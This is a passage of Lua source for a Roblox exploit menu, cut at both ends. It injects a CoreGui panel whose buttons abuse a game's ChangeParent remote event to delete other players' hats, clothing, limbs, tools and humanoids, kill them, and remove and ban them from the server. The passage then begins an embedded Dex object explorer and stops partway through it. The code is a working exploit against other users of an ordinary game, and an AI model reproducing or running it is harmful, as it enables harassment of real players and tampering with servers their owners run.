onlyIncludeInTable(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = onlyIncludeInTable(initialPlayers,getPlayersByName(tokenContent)) end else local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = removeTableMatches(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = removeTableMatches(initialPlayers,getPlayersByName(tokenContent)) end end end for i,v in pairs(initialPlayers) do table.insert(foundList,v) end end local foundNames = {} for i,v in pairs(foundList) do table.insert(foundNames,v.Name) end return foundNames end function Destroy(instance) spawn(function() game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(instance, nil) end) end main.Name = "main" main.Parent = game:GetService("CoreGui") top.Name = "top" top.Parent = main top.Active = true top.BackgroundColor3 = Color3.fromRGB(47, 47, 47) top.BackgroundTransparency = 0.300 top.BorderColor3 = Color3.fromRGB(29, 29, 29) top.Draggable = true top.Position = UDim2.new(0.612145662, 102, 0.311965823, -29) top.Size = UDim2.new(0, 291, 0, 30) back.Name = "back" back.Parent = top back.BackgroundColor3 = Color3.fromRGB(47, 47, 47) back.BackgroundTransparency = 0.300 back.BorderColor3 = Color3.fromRGB(29, 29, 29) back.BorderSizePixel = 0 back.Position = UDim2.new(-0.00343642617, 0, 1, 0) back.Size = UDim2.new(0, 293, 0, 293) ScrollingFrame.Parent = back ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame.BackgroundTransparency = 1.000 ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.LayoutOrder = 999999999 ScrollingFrame.Position = UDim2.new(0.0341299027, 0, 0.0784982964, 0) ScrollingFrame.Size = UDim2.new(0, 282, 0, 208) ScrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 825) bald.Name = "bald" bald.Parent = ScrollingFrame bald.BackgroundColor3 = Color3.fromRGB(172, 172, 172) bald.BackgroundTransparency = 0.500 bald.BorderSizePixel = 0 bald.Size = UDim2.new(0, 131, 0, 40) bald.Font = Enum.Font.SourceSansLight bald.Text = "Bald" bald.TextColor3 = Color3.fromRGB(255, 255, 255) bald.TextSize = 23.000 bald.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end end end) ragdoll.Name = "ragdoll" ragdoll.Parent = ScrollingFrame ragdoll.BackgroundColor3 = Color3.fromRGB(172, 172, 172) ragdoll.BackgroundTransparency = 0.500 ragdoll.BorderSizePixel = 0 ragdoll.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) ragdoll.Size = UDim2.new(0, 131, 0, 40) ragdoll.Font = Enum.Font.SourceSansLight ragdoll.Text = "Ragdoll" ragdoll.TextColor3 = Color3.fromRGB(255, 255, 255) ragdoll.TextSize = 23.000 ragdoll.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) end end) kill.Name = "kill" kill.Parent = ScrollingFrame kill.BackgroundColor3 = Color3.fromRGB(172, 172, 172) kill.BackgroundTransparency = 0.500 kill.BorderSizePixel = 0 kill.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) kill.Size = UDim2.new(0, 131, 0, 40) kill.Font = Enum.Font.SourceSansLight kill.Text = "Kill" kill.TextColor3 = Color3.fromRGB(255, 255, 255) kill.TextSize = 23.000 kill.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character.Torso.Neck) else Destroy(Players[v].Character.Head.Neck) end end end) naked.Name = "naked" naked.Parent = ScrollingFrame naked.BackgroundColor3 = Color3.fromRGB(172, 172, 172) naked.BackgroundTransparency = 0.500 naked.BorderSizePixel = 0 naked.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) naked.Size = UDim2.new(0, 131, 0, 40) naked.Font = Enum.Font.SourceSansLight naked.Text = "Naked" naked.TextColor3 = Color3.fromRGB(255, 255, 255) naked.TextSize = 23.000 naked.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) end end) goto.Name = "goto" goto.Parent = ScrollingFrame goto.BackgroundColor3 = Color3.fromRGB(172, 172, 172) goto.BackgroundTransparency = 0.500 goto.BorderSizePixel = 0 goto.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) goto.Size = UDim2.new(0, 131, 0, 40) goto.Font = Enum.Font.SourceSansLight goto.Text = "Goto" goto.TextColor3 = Color3.fromRGB(255, 255, 255) goto.TextSize = 23.000 goto.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character ~= nil then if Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid') and Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid').SeatPart then Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid').Sit = false wait(.1) end getRoot(Players.LocalPlayer.Character).CFrame = getRoot(Players[v].Character).CFrame + Vector3.new(3,1,0) end end end) rtools.Name = "rtools" rtools.Parent = ScrollingFrame rtools.BackgroundColor3 = Color3.fromRGB(172, 172, 172) rtools.BackgroundTransparency = 0.500 rtools.BorderSizePixel = 0 rtools.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) rtools.Size = UDim2.new(0, 131, 0, 40) rtools.Font = Enum.Font.SourceSansLight rtools.Text = "Rtools" rtools.TextColor3 = Color3.fromRGB(255, 255, 255) rtools.TextSize = 23.000 rtools.MouseButton1Click:connect(function() local players = getPlayer(target.Text) for i, v in pairs(players) do for i, v in pairs(Players[v]:FindFirstChildOfClass("Backpack"):GetChildren()) do Destroy(v) end end end) box.Name = "box" box.Parent = ScrollingFrame box.BackgroundColor3 = Color3.fromRGB(172, 172, 172) box.BackgroundTransparency = 0.500 box.BorderSizePixel = 0 box.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) box.Size = UDim2.new(0, 131, 0, 40) box.Font = Enum.Font.SourceSansLight box.Text = "Box" box.TextColor3 = Color3.fromRGB(255, 255, 255) box.TextSize = 23.000 box.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) Destroy(Players[v].Character.Head:FindFirstChildOfClass("SpecialMesh")) Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) sink.Name = "sink" sink.Parent = ScrollingFrame sink.BackgroundColor3 = Color3.fromRGB(172, 172, 172) sink.BackgroundTransparency = 0.500 sink.BorderSizePixel = 0 sink.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) sink.Size = UDim2.new(0, 131, 0, 40) sink.Font = Enum.Font.SourceSansLight sink.Text = "Sink" sink.TextColor3 = Color3.fromRGB(255, 255, 255) sink.TextSize = 23.000 sink.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.HumanoidRootPart) end end) function FindInTable(tbl,val) if tbl == nil then return false end for _,v in pairs(tbl) do if v == val then return true end end return false end local slockk = false local banned = {} Players.PlayerAdded:connect(function(plr) if slockk then Destroy(plr) end if FindInTable(banned, plr.UserId) then Destroy(plr) end end) ban.Name = "ban" ban.Parent = ScrollingFrame ban.BackgroundColor3 = Color3.fromRGB(172, 172, 172) ban.BackgroundTransparency = 0.500 ban.BorderSizePixel = 0 ban.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) ban.Size = UDim2.new(0, 131, 0, 40) ban.Font = Enum.Font.SourceSansLight ban.Text = "Ban" ban.TextColor3 = Color3.fromRGB(255, 255, 255) ban.TextSize = 23.000 ban.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do table.insert(banned, Players[v].UserId) Destroy(Players[v]) end end) explorer.Name = "explorer" explorer.Parent = ScrollingFrame explorer.BackgroundColor3 = Color3.fromRGB(172, 172, 172) explorer.BackgroundTransparency = 0.500 explorer.BorderSizePixel = 0 explorer.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) explorer.Size = UDim2.new(0, 131, 0, 40) explorer.Font = Enum.Font.SourceSansLight explorer.Text = "Explorer" explorer.TextColor3 = Color3.fromRGB(255, 255, 255) explorer.TextSize = 23.000 explorer.MouseButton1Click:connect(function() CreateGui = function() local NewGuiPart1 = Instance.new("ScreenGui") local NewGuiPart2 = Instance.new("Frame") local NewGuiPart3 = Instance.new("Frame") local NewGuiPart4 = Instance.new("TextLabel") local NewGuiPart5 = Instance.new("TextBox") local NewGuiPart6 = Instance.new("Frame") local NewGuiPart7 = Instance.new("Frame") local NewGuiPart8 = Instance.new("TextButton") local NewGuiPart9 = Instance.new("TextLabel") local NewGuiPart10 = Instance.new("TextLabel") local NewGuiPart11 = Instance.new("ImageLabel") local NewGuiPart12 = Instance.new("Frame") local NewGuiPart13 = Instance.new("Frame") local NewGuiPart14 = Instance.new("Frame") local NewGuiPart15 = Instance.new("TextButton") local NewGuiPart16 = Instance.new("ImageLabel") local NewGuiPart17 = Instance.new("TextButton") local NewGuiPart18 = Instance.new("ImageLabel") local NewGuiPart19 = Instance.new("TextButton") local NewGuiPart20 = Instance.new("ImageLabel") local NewGuiPart21 = Instance.new("TextButton") local NewGuiPart22 = Instance.new("ImageLabel") local NewGuiPart23 = Instance.new("TextButton") local NewGuiPart24 = Instance.new("ImageLabel") local NewGuiPart25 = Instance.new("TextButton") local NewGuiPart26 = Instance.new("ImageLabel") local NewGuiPart27 = Instance.new("TextButton") local NewGuiPart28 = Instance.new("Frame") local NewGuiPart29 = Instance.new("Frame") local NewGuiPart30 = Instance.new("TextLabel") local NewGuiPart31 = Instance.new("Frame") local NewGuiPart32 = Instance.new("TextLabel") local NewGuiPart33 = Instance.new("TextLabel") local NewGuiPart34 = Instance.new("TextButton") local NewGuiPart35 = Instance.new("TextLabel") local NewGuiPart36 = Instance.new("TextLabel") local NewGuiPart37 = Instance.new("Frame") local NewGuiPart38 = Instance.new("Frame") local NewGuiPart39 = Instance.new("TextLabel") local NewGuiPart40 = Instance.new("Frame") local NewGuiPart41 = Instance.new("TextButton") local NewGuiPart42 = Instance.new("TextLabel") local NewGuiPart43 = Instance.new("TextButton") local NewGuiPart44 = Instance.new("TextBox") local NewGuiPart45 = Instance.new("TextButton") local NewGuiPart46 = Instance.new("TextLabel") local NewGuiPart47 = Instance.new("TextLabel") local NewGuiPart48 = Instance.new("Frame") local NewGuiPart49 = Instance.new("TextLabel") local NewGuiPart50 = Instance.new("Frame") local NewGuiPart51 = Instance.new("TextButton") local NewGuiPart52 = Instance.new("TextLabel") local NewGuiPart53 = Instance.new("TextButton") local NewGuiPart54 = Instance.new("Frame") local NewGuiPart55 = Instance.new("TextLabel") local NewGuiPart56 = Instance.new("Frame") local NewGuiPart57 = Instance.new("TextLabel") local NewGuiPart58 = Instance.new("TextButton") local NewGuiPart59 = Instance.new("Frame") local NewGuiPart60 = Instance.new("TextLabel") local NewGuiPart61 = Instance.new("Frame") local NewGuiPart62 = Instance.new("TextLabel") local NewGuiPart63 = Instance.new("ScrollingFrame") local NewGuiPart64 = Instance.new("TextButton") local NewGuiPart65 = Instance.new("TextLabel") local NewGuiPart66 = Instance.new("TextLabel") local NewGuiPart67 = Instance.new("TextButton") local NewGuiPart68 = Instance.new("TextButton") local NewGuiPart69 = Instance.new("Frame") local NewGuiPart70 = Instance.new("TextButton") local NewGuiPart71 = Instance.new("TextBox") local NewGuiPart72 = Instance.new("TextButton") local NewGuiPart73 = Instance.new("TextButton") local NewGuiPart74 = Instance.new("Frame") local NewGuiPart75 = Instance.new("Frame") local NewGuiPart76 = Instance.new("TextButton") local NewGuiPart77 = Instance.new("ScrollingFrame") local NewGuiPart78 = Instance.new("Frame") local NewGuiPart79 = Instance.new("TextLabel") local NewGuiPart80 = Instance.new("TextLabel") local NewGuiPart81 = Instance.new("TextLabel") local NewGuiPart82 = Instance.new("Frame") local NewGuiPart83 = Instance.new("TextLabel") local NewGuiPart84 = Instance.new("Frame") local NewGuiPart85 = Instance.new("Frame") local NewGuiPart86 = Instance.new("Frame") local NewGuiPart87 = Instance.new("ImageButton") local NewGuiPart88 = Instance.new("Frame") local NewGuiPart89 = Instance.new("Frame") local NewGuiPart90 = Instance.new("Frame") local NewGuiPart91 = Instance.new("Frame") local NewGuiPart92 = Instance.new("Frame") local NewGuiPart93 = Instance.new("ImageButton") local NewGuiPart94 = Instance.new("Frame") local NewGuiPart95 = Instance.new("Frame") local NewGuiPart96 = Instance.new("Frame") local NewGuiPart97 = Instance.new("Frame") local NewGuiPart98 = Instance.new("Frame") local NewGuiPart99 = Instance.new("TextButton") local NewGuiPart100 = Instance.new("Frame") local NewGuiPart101 = Instance.new("Frame") local NewGuiPart102 = Instance.new("TextButton") local NewGuiPart103 = Instance.new("TextButton") local NewGuiPart104 = Instance.new("TextButton") local NewGuiPart105 = Instance.new("Frame") local NewGuiPart106 = Instance.new("Frame") local NewGuiPart107 = Instance.new("TextLabel") local NewGuiPart108 = Instance.new("TextLabel") local NewGuiPart109 = Instance.new("TextLabel") local NewGuiPart110 = Instance.new("ImageLabel") local NewGuiPart111 = Instance.new("Frame") local NewGuiPart112 = Instance.new("Frame") local NewGuiPart113 = Instance.new("TextLabel") local NewGuiPart114 = Instance.new("Frame") local NewGuiPart115 = Instance.new("Frame") local NewGuiPart116 = Instance.new("TextLabel") local NewGuiPart117 = Instance.new("TextLabel") local NewGuiPart118 = Instance.new("TextButton") local NewGuiPart119 = Instance.new("TextLabel") local NewGuiPart120 = Instance.new("TextLabel") local NewGuiPart121 = Instance.new("Frame") local NewGuiPart122 = Instance.new("TextLabel") local NewGuiPart123 = Instance.new("TextLabel") local NewGuiPart124 = Instance.new("TextButton") local NewGuiPart125 = Instance.new("TextLabel") local NewGuiPart126 = Instance.new("TextLabel") local NewGuiPart127 = Instance.new("Frame") local NewGuiPart128 = Instance.new("TextLabel") local NewGuiPart129 = Instance.new("TextLabel") local NewGuiPart130 = Instance.new("TextButton") local NewGuiPart131 = Instance.new("TextLabel") local NewGuiPart132 = Instance.new("TextLabel") local NewGuiPart133 = Instance.new("Frame") local NewGuiPart134 = Instance.new("TextLabel") local NewGuiPart135 = Instance.new("TextLabel") local NewGuiPart136 = Instance.new("TextButton") local NewGuiPart137 = Instance.new("TextLabel") local NewGuiPart138 = Instance.new("TextLabel") local NewGuiPart139 = Instance.new("TextLabel") local NewGuiPart140 = Instance.new("Frame") local NewGuiPart141 = Instance.new("Frame") local NewGuiPart142 = Instance.new("TextLabel") local NewGuiPart143 = Instance.new("TextButton") local NewGuiPart144 = Instance.new("TextBox") local NewGuiPart145 = Instance.new("Frame") local NewGuiPart146 = Instance.new("TextButton") local NewGuiPart147 = Instance.new("TextLabel") local NewGuiPart148 = Instance.new("TextLabel") local NewGuiPart149 = Instance.new("Frame") local NewGuiPart150 = Instance.new("Frame") local NewGuiPart151 = Instance.new("TextLabel") local NewGuiPart152 = Instance.new("TextLabel") local NewGuiPart153 = Instance.new("BindableFunction") local NewGuiPart154 = Instance.new("BindableFunction") local NewGuiPart155 = Instance.new("BindableFunction") local NewGuiPart156 = Instance.new("BindableFunction") local NewGuiPart157 = Instance.new("BindableEvent") local NewGuiPart158 = Instance.new("BindableFunction") local NewGuiPart159 = Instance.new("BindableFunction") local NewGuiPart160 = Instance.new("BindableEvent") local NewGuiPart161 = Instance.new("BindableFunction") local NewGuiPart162 = Instance.new("BindableFunction") local NewGuiPart163 = Instance.new("BindableEvent") -- Properties NewGuiPart1.Name = "Dex" NewGuiPart2.Name = "PropertiesFrame" NewGuiPart2.Parent = NewGuiPart1 NewGuiPart2.Active = true NewGuiPart2.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart2.BackgroundTransparency = 0.10000000149012 NewGuiPart2.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart2.Position = UDim2.new(1, 0, 0.5, 36) NewGuiPart2.Size = UDim2.new(0, 300, 0.5, -36) NewGuiPart158.Name = "GetApi" NewGuiPart158.Parent = NewGuiPart2 NewGuiPart158.Archivable = true NewGuiPart159.Name = "GetAwaiting" NewGuiPart159.Parent = NewGuiPart2 NewGuiPart159.Archivable = true NewGuiPart160.Name = "SetAwaiting" NewGuiPart160.Parent = NewGuiPart2 NewGuiPart160.Archivable = true NewGuiPart3.Name = "Header" NewGuiPart3.Parent = NewGuiPart2 NewGuiPart3.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart3.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart3.Position = UDim2.new(0, 0, 0, -36) NewGuiPart3.Size = UDim2.new(1, 0, 0, 35) NewGuiPart4.Parent = NewGuiPart3 NewGuiPart4.BackgroundTransparency = 1 NewGuiPart4.Position = UDim2.new(0, 4, 0, 0) NewGuiPart4.Size = UDim2.new(1, -4, 0.5, 0) NewGuiPart4.Font = Enum.Font.SourceSans NewGuiPart4.FontSize = Enum.FontSize.Size14 NewGuiPart4.Text = "Properties" NewGuiPart4.TextColor3 = Color3.new(0, 0, 0) NewGuiPart4.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart5.Parent = NewGuiPart3 NewGuiPart5.BackgroundTransparency = 0.80000001192093 NewGuiPart5.Position = UDim2.new(0, 4, 0.5, 0) NewGuiPart5.Size = UDim2.new(1, -8, 0.5, -3) NewGuiPart5.Font = Enum.Font.SourceSans NewGuiPart5.FontSize = Enum.FontSize.Size14 NewGuiPart5.Text = "Search Properties" --NewGuiPart5.TextColor3 = Color3.new(0, 0, 0) NewGuiPart5.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart6.Name = "ExplorerPanel" NewGuiPart6.Parent = NewGuiPart1 NewGuiPart6.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart6.BackgroundTransparency = 0.10000000149012 NewGuiPart6.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart6.Position = UDim2.new(1, 0, 0, 0) NewGuiPart6.Size = UDim2.new(0, 300, 0.5, 0) NewGuiPart153.Name = "GetOption" NewGuiPart153.Parent = NewGuiPart6 NewGuiPart153.Archivable = true NewGuiPart154.Name = "TotallyNotGetSelection" NewGuiPart154.Parent = NewGuiPart6 NewGuiPart154.Archivable = true NewGuiPart155.Name = "SetOption" NewGuiPart155.Parent = NewGuiPart6 NewGuiPart155.Archivable = true NewGuiPart156.Name = "TotallyNotSetSelection" NewGuiPart156.Parent = NewGuiPart6 NewGuiPart156.Archivable = true NewGuiPart157.Name = "TotallyNotSelectionChanged" NewGuiPart157.Parent = NewGuiPart6 NewGuiPart157.Archivable = true NewGuiPart7.Name = "SideMenu" NewGuiPart7.Parent = NewGuiPart1 NewGuiPart7.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart7.BackgroundTransparency = 1 NewGuiPart7.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart7.BorderSizePixel = 0 NewGuiPart7.Position = UDim2.new(1, -330, 0, 0) NewGuiPart7.Size = UDim2.new(0, 30, 0, 180) NewGuiPart7.Visible = false NewGuiPart7.ZIndex = 2 NewGuiPart8.Name = "Toggle" NewGuiPart8.Parent = NewGuiPart7 NewGuiPart8.Active = false NewGuiPart8.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart8.BorderSizePixel = 0 NewGuiPart8.Position = UDim2.new(0, 0, 0, 60) NewGuiPart8.Size = UDim2.new(0, 30, 0, 30) NewGuiPart8.AutoButtonColor = false NewGuiPart8.Font = Enum.Font.SourceSans NewGuiPart8.FontSize = Enum.FontSize.Size24 NewGuiPart8.Text = ">" NewGuiPart8.TextTransparency = 1 NewGuiPart8.TextWrapped = true NewGuiPart9.Name = "Title" NewGuiPart9.Parent = NewGuiPart7 NewGuiPart9.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart9.BackgroundTransparency = 1 NewGuiPart9.Size = UDim2.new(0, 30, 0, 20) NewGuiPart9.ZIndex = 2 NewGuiPart9.Font = Enum.Font.SourceSansBold NewGuiPart9.FontSize = Enum.FontSize.Size14 NewGuiPart9.Text = "DEX" NewGuiPart9.TextWrapped = true NewGuiPart10.Name = "Version" NewGuiPart10.Parent = NewGuiPart7 NewGuiPart10.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart10.BackgroundTransparency = 1 NewGuiPart10.Position = UDim2.new(0, 0, 0, 15) NewGuiPart10.Size = UDim2.new(0, 30, 0, 20) NewGuiPart10.ZIndex = 2 NewGuiPart10.Font = Enum.Font.SourceSansBold NewGuiPart10.FontSize = Enum.FontSize.Size12 NewGuiPart10.Text = "V2.0.0" NewGuiPart10.TextWrapped = true NewGuiPart11.Name = "Slant" NewGuiPart11.Parent = NewGuiPart7 NewGuiPart11.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart11.BackgroundTransparency = 1 NewGuiPart11.Position = UDim2.new(0, 0, 0, 90) NewGuiPart11.Rotation = 180 NewGuiPart11.Size = UDim2.new(0, 30, 0, 30) NewGuiPart11.Image = "rbxassetid://474172996" NewGuiPart11.ImageColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart12.Name = "Main" NewGuiPart12.Parent = NewGuiPart7 NewGuiPart12.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart12.BorderSizePixel = 0 NewGuiPart12.Size = UDim2.new(0, 30, 0, 30) NewGuiPart13.Name = "SlideOut" NewGuiPart13.Parent = NewGuiPart7 NewGuiPart13.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart13.BackgroundTransparency = 1 NewGuiPart13.BorderSizePixel = 0 NewGuiPart13.ClipsDescendants = true NewGuiPart13.Position = UDim2.new(0, 0, 0, 30) NewGuiPart13.Size = UDim2.new(0, 30, 0, 150) NewGuiPart14.Name = "SlideFrame" NewGuiPart14.Parent = NewGuiPart13 NewGuiPart14.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart14.BorderSizePixel = 0 NewGuiPart14.Position = UDim2.new(0, 0, 0, -150) NewGuiPart14.Size = UDim2.new(0, 30, 0, 150) NewGuiPart15.Name = "Explorer" NewGuiPart15.Parent = NewGuiPart14 NewGuiPart15.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart15.BackgroundTransparency = 1 NewGuiPart15.BorderSizePixel = 0 NewGuiPart15.Position = UDim2.new(0, 0, 0, 120) NewGuiPart15.Size = UDim2.new(0, 30, 0, 30) NewGuiPart15.ZIndex = 2 NewGuiPart15.AutoButtonColor = false NewGuiPart15.Font = Enum.Font.SourceSans NewGuiPart15.FontSize = Enum.FontSize.Size24 NewGuiPart15.Text = "" NewGuiPart16.Name = "Icon" NewGuiPart16.Parent = NewGuiPart15 NewGuiPart16.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart16.BackgroundTransparency = 1 NewGuiPart16.Position = UDim2.new(0, 5, 0, 5) NewGuiPart16.Size = UDim2.new(0, 20, 0, 20) NewGuiPart16.ZIndex = 2 NewGuiPart16.Image = "rbxassetid://472635937" NewGuiPart16.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart17.Name = "SaveMap" NewGuiPart17.Parent = NewGuiPart14 NewGuiPart17.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart17.BackgroundTransparency = 1 NewGuiPart17.BorderSizePixel = 0 NewGuiPart17.Position = UDim2.new(0, 0, 0, 90) NewGuiPart17.Size = UDim2.new(0, 30, 0, 30) NewGuiPart17.ZIndex = 2 NewGuiPart17.AutoButtonColor = false NewGuiPart17.Font = Enum.Font.SourceSans NewGuiPart17.FontSize = Enum.FontSize.Size24 NewGuiPart17.Text = "" NewGuiPart18.Name = "Icon" NewGuiPart18.Parent = NewGuiPart17 NewGuiPart18.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart18.BackgroundTransparency = 1 NewGuiPart18.Position = UDim2.new(0, 5, 0, 5) NewGuiPart18.Size = UDim2.new(0, 20, 0, 20) NewGuiPart18.ZIndex = 2 NewGuiPart18.Image = "rbxassetid://472636337" NewGuiPart18.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart19.Name = "Settings" NewGuiPart19.Parent = NewGuiPart14 NewGuiPart19.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart19.BackgroundTransparency = 1 NewGuiPart19.BorderSizePixel = 0 NewGuiPart19.Position = UDim2.new(0, 0, 0, 30) NewGuiPart19.Size = UDim2.new(0, 30, 0, 30) NewGuiPart19.ZIndex = 2 NewGuiPart19.AutoButtonColor = false NewGuiPart19.Font = Enum.Font.SourceSans NewGuiPart19.FontSize = Enum.FontSize.Size24 NewGuiPart19.Text = "" NewGuiPart20.Name = "Icon" NewGuiPart20.Parent = NewGuiPart19 NewGuiPart20.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart20.BackgroundTransparency = 1 NewGuiPart20.Position = UDim2.new(0, 5, 0, 5) NewGuiPart20.Size = UDim2.new(0, 20, 0, 20) NewGuiPart20.ZIndex = 2 NewGuiPart20.Image = "rbxassetid://472635774" NewGuiPart20.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart21.Name = "Remotes" NewGuiPart21.Parent = NewGuiPart14 NewGuiPart21.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart21.BackgroundTransparency = 1 NewGuiPart21.BorderSizePixel = 0 NewGuiPart21.Position = UDim2.new(0, 0, 0, 60) NewGuiPart21.Size = UDim2.new(0, 30, 0, 30) NewGuiPart21.ZIndex = 2 NewGuiPart21.AutoButtonColor = false NewGuiPart21.Font = Enum.Font.SourceSans NewGuiPart21.FontSize = Enum.FontSize.Size24 NewGuiPart21.Text = "" NewGuiPart22.Name = "Icon" NewGuiPart22.Parent = NewGuiPart21 NewGuiPart22.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart22.BackgroundTransparency = 1 NewGuiPart22.Position = UDim2.new(0, 5, 0, 5) NewGuiPart22.Size = UDim2.new(0, 20, 0, 20) NewGuiPart22.ZIndex = 2 NewGuiPart22.Image = "rbxassetid://472636187" NewGuiPart22.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart23.Name = "About" NewGuiPart23.Parent = NewGuiPart14 NewGuiPart23.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart23.BackgroundTransparency = 1 NewGuiPart23.BorderSizePixel = 0 NewGuiPart23.Size = UDim2.new(0, 30, 0, 30) NewGuiPart23.ZIndex = 2 NewGuiPart23.AutoButtonColor = false NewGuiPart23.Font = Enum.Font.SourceSans NewGuiPart23.FontSize = Enum.FontSize.Size24 NewGuiPart23.Text = "" NewGuiPart24.Name = "Icon" NewGuiPart24.Parent = NewGuiPart23 NewGuiPart24.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart24.BackgroundTransparency = 1 NewGuiPart24.Position = UDim2.new(0, 5, 0, 5) NewGuiPart24.Size = UDim2.new(0, 20, 0, 20) NewGuiPart24.ZIndex = 2 NewGuiPart24.Image = "rbxassetid://476354004" NewGuiPart24.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart25.Name = "OpenScriptEditor" NewGuiPart25.Parent = NewGuiPart7 NewGuiPart25.Active = false NewGuiPart25.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart25.BorderSizePixel = 0 NewGuiPart25.Position = UDim2.new(0, 0, 0, 30) NewGuiPart25.Size = UDim2.new(0, 30, 0, 30) NewGuiPart25.ZIndex = 2 NewGuiPart25.AutoButtonColor = false NewGuiPart25.Font = Enum.Font.SourceSans NewGuiPart25.FontSize = Enum.FontSize.Size24 NewGuiPart25.Text = "" NewGuiPart26.Name = "Icon" NewGuiPart26.Parent = NewGuiPart25 NewGuiPart26.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart26.BackgroundTransparency = 1 NewGuiPart26.Position = UDim2.new(0, 5, 0, 5) NewGuiPart26.Size = UDim2.new(0, 20, 0, 20) NewGuiPart26.ZIndex = 2 NewGuiPart26.Image = "rbxassetid://475456048" NewGuiPart26.ImageColor3 = Color3.new(0.105882, 0.164706, 0.207843) NewGuiPart26.ImageTransparency = 1 NewGuiPart27.Name = "Toggle" NewGuiPart27.Parent = NewGuiPart1 NewGuiPart27.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart27.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart27.Position = UDim2.new(1, 0, 0, 0) NewGuiPart27.Size = UDim2.new(0, 30, 0, 30) NewGuiPart27.Font = Enum.Font.SourceSans 